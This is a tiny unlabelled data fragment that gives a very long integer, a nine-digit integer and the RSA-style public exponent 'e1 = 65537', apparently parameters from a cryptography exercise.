508217286135472315441400986095134246568423059733313661889766778708169916782695687261332248925854657968899158747271729946063410715273093749317366023741353285087315449824295777924249534620958631387244610341601736062587218102410512
731401289

e1 = 65537